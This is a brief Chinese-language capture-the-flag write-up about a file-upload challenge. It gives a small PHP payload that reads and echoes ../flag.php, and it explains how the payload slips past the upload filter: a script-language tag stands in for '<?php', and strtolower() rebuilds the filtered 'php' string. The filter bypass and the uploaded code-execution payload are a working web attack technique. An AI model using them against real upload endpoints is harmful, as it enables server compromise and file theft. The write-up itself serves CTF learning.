一句话木马,第一次接触。
可以上传一个文件,同时还能打开这个文件,因此上传一个php木马。
<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP"))); #点号.是连接符
fclose($fh);
</script>
原本的php是<?php,但是题中后台过滤了?,因此使用script,同时过滤的php使用大写和strtolower来搞定连接。
strtolower() :把字符串转换为小写
然后上传成功后打开源代码,发现flag。